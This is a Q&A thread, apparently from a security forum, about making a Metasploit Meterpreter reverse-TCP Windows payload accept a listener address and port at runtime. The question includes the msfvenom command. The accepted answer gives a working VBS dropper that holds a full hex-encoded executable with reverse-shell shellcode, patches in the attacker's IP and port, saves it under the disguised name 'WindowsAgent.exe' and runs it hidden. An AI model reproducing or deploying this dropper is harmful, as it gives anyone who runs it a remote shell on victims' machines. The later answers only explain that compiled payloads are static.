# MSFvenom payload with dynamic options

Tags: metasploit, shellcode, meterpreter

I am using MSFvenom to export meterpreter's reverse TCP payload. While this works with `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe`, however I would like to specify the `LHOST` and `LPORT` in a dynamic fashion.

Ideally, I would pass in the arguments directly to the executable file. For example, in Command Prompt running `shell_meterpreter.exe -LHOST 192.168.6.100 -LPORT 1111`.

Does anyone know of a way to achieve this? I have tried looking into the source code but didn't find much luck there.

Comment: The source code of meterpreter is available freely; write a loader yourself.

Answer (score 0, accepted):

I managed to find a solution that worked for me.

I found the variables for LPORT and LHOST in the executable's hex view (see screenshot).[image: Meterpreter hex dump]

If anyone is intested, I wrote a small VBS script that splices into that hex code.

```
Function BuildExe(Text) 
    ' Convert the string to hex.
    Set dom = CreateObject("Microsoft.XMLDOM")
    dom.loadXML("<TtB/>")
    dom.documentElement.nodeTypedValue = Text
    dom.documentElement.dataType = "bin.hex"
    exeHex = dom.documentElement.nodeTypedValue

    ' Create the filename and filepath for the executable.
    exeFile = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "\" & CreateObject("Scripting.FileSystemObject").GetTempName()
    CreateObject("Scripting.FileSystemObject").CreateFolder(exeFile)
    exePath = exeFile & "\" & "WindowsAgent.exe"

    ' Compile and save the executbale.
    Set exeStream = CreateObject("ADODB.Stream")
    exeStream.Type = 1
    exeStream.Open
    exeStream.Write exeHex
    exeStream.SaveToFile exePath, 2

    ' Return the executable filepath.
    BuildExe = exePath
End Function

' Initialize the script.
Log "PAYLOAD", "Payload shell_meterpreter.vbs has been launched."
Execute("lib\includes\build_exe.vbs")

' Set the listener info in hex.
LPORT = Hex("4444")

octets = Split("192.168.6.131"), ".")
For i = 0 To UBound(octets)
    octectTemp = Hex(octets(i))
    If Len(octectTemp) = 1 Then
        octectTemp = 0 & octectTemp
    End If

    If i = 0 Then
        LHOST = octectTemp
    Else
        LHOST = LHOST & octectTemp
    End If
Next

' Build and run Meterpreter.
exePath = BuildExe("4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000C80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000392411DD7D457F8E7D457F8E7D457F8E5A83048E7E457F8E7D457E8E7F457F8E743DEA8E7C457F8E743DEE8E7C457F8E526963687D457F8E0000000000000000000000000000000050450000648603007D3CC64B0000000000000000F00023000B0201000030000000100000000000000040000000100000000000400100000000100000000200000400000000000000040000000000000078420000480200006C34000002000080000010000000000000100000000000000000100000000000001000000000000000000000100000000000000000000000004200006C000000000000000000000000000000000000000000000000000000704200000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000180000000000000000000000000000000000000000000000000000002E746578740000004E100000001000000012000000040000000000000000000000000000200000602E7264617461000084000000003000000002000000160000000000000000000000000000400000402E616F6C6500000078020000004000000004000000180000000000000000000000000000200000E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004883EC2849C7C14000000049C7C00030000048C7C2001000004833C9E82710000048C7C10010000048BE4110004001000000488BF8F3A4FFD04833C9E8011000005041594C4F41443A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000CCFF25C00F0000FF25B20F000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004030000000000000000000007630000000300000000000000000000000000000000000000000000066300000000000005830000000000000000000000000000005014578697450726F636573730058045669727475616C416C6C6F6300004B45524E454C33322E646C6C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FC4883E4F0E8CC000000415141505251564831D265488B5260488B5218488B5220488B7250480FB74A4A4D31C94831C0AC3C617C022C2041C1C90D4101C1E2ED524151488B52208B423C4801D0668178180B020F85720000008B80880000004885C074674801D0508B4818448B40204901D0E35648FFC9418B34884801D64D31C94831C0AC41C1C90D4101C138E075F14C034C24084539D175D858448B40244901D066418B0C48448B401C4901D0418B04884801D0415841585E595A41584159415A4883EC204152FFE05841595A488B12E94BFFFFFF5D49BE7773325F3332000041564989E64881ECA00100004989E549BC0200" & LPORT & LHOST & "41544989E44C89F141BA4C772607FFD54C89EA68010100005941BA29806B00FFD56A0A415E50504D31C94D31C048FFC04889C248FFC04889C141BAEA0FDFE0FFD54889C76A1041584C89E24889F941BA99A57461FFD585C0740A49FFCE75E5E8930000004883EC104889E24D31C96A0441584889F941BA02D9C85FFFD583F8007E554883C4205E89F66A404159680010000041584889F24831C941BA58A453E5FFD54889C34989C74D31C94989F04889DA4889F941BA02D9C85FFFD583F8007D2858415759680040000041586A005A41BA0B2F0F30FFD5575941BA756E4D61FFD549FFCEE93CFFFFFF4801C34829C64885F675B441FFE7586A005949C7C2F0B5A256FFD500002842000000000000FFFFFFFF404200000030000000000000000000000000000000000000000000004E420000000000005E4200000000000000000000000000004B45524E454C33322E646C6C000058045669727475616C416C6C6F63000005014578697450726F63657373000000000000000000080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WScript.CreateObject("WScript.Shell").Run "cmd.exe /C start /B cmd /C " & exePath, 0, True
```

Answer (score 1):

```
msfvenom -p windows/x64/meterpreter/reverse_tcp **LHOST=192.168.x.x** LPORT=4444 -f -exe
```

You're using msfvenom here to generate code to attain a reverse shell on the target, you aren't passing the attacking machine's ip to it once it's generated or in your case, compiled as an executable if that makes sense.

Comment: I understand I am passing my IP address to MSvenom, I am trying to create a way to modify the input of that value on the fly. That way, if my IP address changes, I can quickly modify it.

Comment: You specified it as a port in your original post, but that' not what I'm getting at. I'm trying to say you can't pass this info to compiled code, you need to either find a different tool or create your own.

Comment: I see what you're saying now... nice catch. Just updated my question.

Comment: I'm not great at explaining this but imagine you create your own shell. The code you generated is literally a hardcoded address specifying your ip and port for where to send your shell, it's not dynamic. Metasploit allows you to set different options but once compiled it's set in stone, the only way to change it is recompile your code and place your new exploit on the machine with this new address and port. If you want to send your shell somewhere new on the fly, you would need to create your own payload and tools outside of msf because it's code would function and be extremely different.

Answer (score 0):

I would write a simple bash script that allows me to quickly add the host and port on the fly and generate the payload with msfvenom.

Comment: Are you able to give an example?

Comment: Your answer could be improved with additional supporting information. Please [edit] to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers [in the help center](/help/how-to-answer).